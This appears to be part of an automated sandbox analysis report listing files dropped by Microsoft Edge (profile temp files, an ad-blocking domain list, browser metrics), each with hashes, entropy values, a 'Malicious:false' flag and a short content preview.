                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.08134020328547377
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:y/8Ye8pSIgv1XlVG0+q2Iqe8lJpvollNTt/4ll/Q6beV/:yUzdGE8lUHtc6V
                                                                                                                                                                                                                                                                                                                                                              MD5:BEC59E45FA44F60D83FFCD6ACA01020A
                                                                                                                                                                                                                                                                                                                                                              SHA1:54DA0D2C35BDFECD180AFE4B91433E1ACE4A2349
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5EA737F49DEF119C5501A235A61CA19131CF8B2F965E4CF402E6C812F86D6317
                                                                                                                                                                                                                                                                                                                                                              SHA-512:03402A8C22A663FC8F41B8AF179705AC8D74F9EE69E698B4814A892DA3F096C7CC6DD583A54FA6DBF9F524077B703AE239A440F888D747B4BA535ADB542959A9
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:i.yK.....................................;...{.......}.......{...............{.......{....:......{.................W.%......}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5b65d0e0-16aa-4630-be71-9ae468e53251.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):44485
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0963870652977015
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xtnUXqgfb3HzgmymhJMJEwO3UQYqGwLWZkHUfG6kCv2:z/Ps+wsI7yOIvgmNf6qfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:77DC6641DED0F7A365624AA3F9805128
                                                                                                                                                                                                                                                                                                                                                              SHA1:378BF53A999491BE0A84734866E1D4F5BB91A850
                                                                                                                                                                                                                                                                                                                                                              SHA-256:60233597BD1B74CAD81C58A802CF84FE2F55E62C8C97E18C367FC73ABA23B5B5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:3EC4C3DDA01EE4018C654CE66B060E6CC0FA3BAF534BB3433969340F7D736AA039506C6A9659E54FF307DAE35A19EAE593330817BDE659CE2A63933F6D69FF8A
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\797f5216-abaa-4a0a-8621-6abac1503d08.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):45367
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.08837754135865
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:0MkbJ6eg6KzhXRLrZ95UUXqgfb3HzgmwemhJMJEwO3wG/CvokQYqGwLWZkHUfG6x:0Mk16zRRvZ9hvgmwpfP/aoqqfyW0e6x
                                                                                                                                                                                                                                                                                                                                                              MD5:C87FE525FA0E78BCA8A052395E4C45C1
                                                                                                                                                                                                                                                                                                                                                              SHA1:E00F08ABCF968CF9D32661C1778F6CABAF222320
                                                                                                                                                                                                                                                                                                                                                              SHA-256:BB7C7D6872A5EB1DE8238D1991AC6BA52756E85B67A12E760258C1269D2A689B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8AC712C0446B2A9BAEBCD5744A0E2759986A0AD68E4753ACE18F4B895009CBE4CF3B8AB4F8D28BC2E589CF03F705DB6D006C42F3B273D9F0A1E0E0D91E772026
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1739863008"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\7b903f68-aba2-41f2-ac0a-effeedaa5381.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.640160905302712
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7w:fwUQC5VwBIiElEd2K57P7w
                                                                                                                                                                                                                                                                                                                                                              MD5:1650AB1CA6AC50D0BDEA538B126A6296
                                                                                                                                                                                                                                                                                                                                                              SHA1:30AB4ADF7602AB87FFF96921DEB4C3638FFCD265
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7FBF4099533EAF1F97E3F6D26A25A84B15200F4EA9B847C8A7DD3B150510753
                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA7B077B388A459163E5CBF91F7865A5212FC534D77B7998D727B65AC2A176EE9AC4FA6D0BA3D5DA6BDF7FA8109E00B1AD69A6FB11A27D80156248407FE8FA46
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.640160905302712
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7w:fwUQC5VwBIiElEd2K57P7w
                                                                                                                                                                                                                                                                                                                                                              MD5:1650AB1CA6AC50D0BDEA538B126A6296
                                                                                                                                                                                                                                                                                                                                                              SHA1:30AB4ADF7602AB87FFF96921DEB4C3638FFCD265
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7FBF4099533EAF1F97E3F6D26A25A84B15200F4EA9B847C8A7DD3B150510753
                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA7B077B388A459163E5CBF91F7865A5212FC534D77B7998D727B65AC2A176EE9AC4FA6D0BA3D5DA6BDF7FA8109E00B1AD69A6FB11A27D80156248407FE8FA46
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67B433DA-1B20.pma

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.5017010762145768
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:gYQqvnFuQxToaH+89OC7qWLvDHzvAaHIjC:VxTTpLrv
                                                                                                                                                                                                                                                                                                                                                              MD5:73E56432F9422569590EE7FEDFB19904
                                                                                                                                                                                                                                                                                                                                                              SHA1:05AAF845B41EF62110CFFC1AD555D0EBBB824228
                                                                                                                                                                                                                                                                                                                                                              SHA-256:899569C463181A0F4154A1C184FEC00A724F4FD5A9B209DEF6105310A19738B2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:364B8650843AA9FECB3088362BC05CB6233478870AE725541FB489FEE8E6DF99F1E718C21B1A25B0C4DF5EAAF3BC73AE798D4D4C8FB036B142F5CD36D1E907D3
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@...................h...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".obnfax20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............2..................8...w..U.>.........."....."...24.."."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z........W@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........9...... .2........V...... .2.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.186405996455797
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlUkzpbazHSAS219jlV/TUqjNlWBVP/Sh/Jzv6cRBAVIGGgphVE7GC/htll:o1U6BaYIlWBVsJD6dpPhVeGC/
                                                                                                                                                                                                                                                                                                                                                              MD5:19287D1A749F585544F68BE58164B985
                                                                                                                                                                                                                                                                                                                                                              SHA1:C80EB89DE341127B62F92261A367903C2C624C57
                                                                                                                                                                                                                                                                                                                                                              SHA-256:AD8116F65282F87E2AA2FBFD002C2455DB865644CA6C5471975536ECB2B652A0
                                                                                                                                                                                                                                                                                                                                                              SHA-512:450BC3085162A0AA5DB09D9A2F5F8778744409C1B52699DD36C9354746036E2F321FD6ECB63F14E854C3423DAD6F1C7C65E7307C211ABFB48A845BAFFAC873F4
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:sdPC....................i...|.@..s..."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8963f191-f8e0-42ec-8449-d20a8242b3e6............

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0d933f12-be74-4278-afb9-d7992a5729a9.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):37149
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.564268871232715
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:AnliIjWPEmfin8F1+UoAYDCx9Tuqh0VfUC9xbog/OVgjm1TXMrwGW2JqKpUtuR:AnliIjWPEmfinu1jaJjmVXlGW2ohtu
                                                                                                                                                                                                                                                                                                                                                              MD5:66234853E6D42D0D60DED16933789D38
                                                                                                                                                                                                                                                                                                                                                              SHA1:9632E7047FD14AC695533E01930833CF6DD6FBA7
                                                                                                                                                                                                                                                                                                                                                              SHA-256:BEF051A7E3E960B78344B09B515F0E317CA82C0DD2E675C6C1EA1025AFAD0DF6
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E72E10ECC09454392BF2913069376EFDA1D26A6101FA3A59DFBFBA80C1DABF2080ED005C9048620D7A5E928675C734630CBEF2927BE27648BDB3AB75E6FE92AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13384336602746429","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13384336602746429","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2dec1ead-2f01-4761-a4cd-822f6c0c385e.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40504
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.561211415579147
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:AnliDl7pLGL79jWPEmfVn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVgjm1TXMrwGWEJ1:AnliDzc79jWPEmfVnu1jaJjmVXlGWEoo
                                                                                                                                                                                                                                                                                                                                                              MD5:4E079B75BA8D0C0FA3A3195A10A57669
                                                                                                                                                                                                                                                                                                                                                              SHA1:6E748AC1E92DB51E428E9B7891275486FCD6A68A
                                                                                                                                                                                                                                                                                                                                                              SHA-256:B252BCDE2FDD239F7D78C293C209CE0D7A746AB42DC2D8502171D80D0CAA6372
                                                                                                                                                                                                                                                                                                                                                              SHA-512:A4B7D51C4EA7985FCC8C1280780434BEC569796CE58A7E1FB3EF7E20E2F4C747A1AA4242625667C8F95599DD136F353064EE7A67069FD39143A47BED45CE984F
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13384336602746429","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13384336602746429","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\60047261-373a-4bd1-877d-819944c29945.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.128787106825038
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:stWkdfsk0PeIlN6xyk33d88bV+FpYQenDfJy93JPdYJ:stWssk0Pei4jbGWQenDg9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:1DCEAF9EB286A9891F631C8ECA8C534F
                                                                                                                                                                                                                                                                                                                                                              SHA1:26FD6C93E9A06372D0C934268D21D812F9F97281
                                                                                                                                                                                                                                                                                                                                                              SHA-256:597C5BA10DABC3D5FB1F2783577B4DF7FDEB8FF5072236B2D8D4C776983A216A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F2C74EDEB54429A7D80F0CCD07A3039A0EBBE5E9C87AC4A6860F2504C99006E93DF2F12DFC8CC21C951F769FE7E34DFA8EE76E2569865203886DFDD165B343D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\60ab815a-e65f-4380-a89b-451acc126a88.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):23119
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.227674541592322
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:stWPGKSu0sk0Pei4eYbGWQUJ2emxp7KB0AlNnUUtu9ViceQ9Q:sYOxuhPe5PbGlFemxp7KtM9L9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:289CD47D06EF42BCBC5ED93657B09AF3
                                                                                                                                                                                                                                                                                                                                                              SHA1:598E0B99985A7C8761FEEFE9F6AD67B90A27759B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1BCAFDF469C4D53D292EBCC2D07873E7EE0549C1F05963D64F132116288149B9
                                                                                                                                                                                                                                                                                                                                                              SHA-512:97C0C37C1225B8AA14A2A04A21CE9BB657D295B4999E8ACC82A29E2E2156A7B1D5F48D02712A00B04D49A8EC9A41D22ECF9B8698D511A5324E0F34072DF96391
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
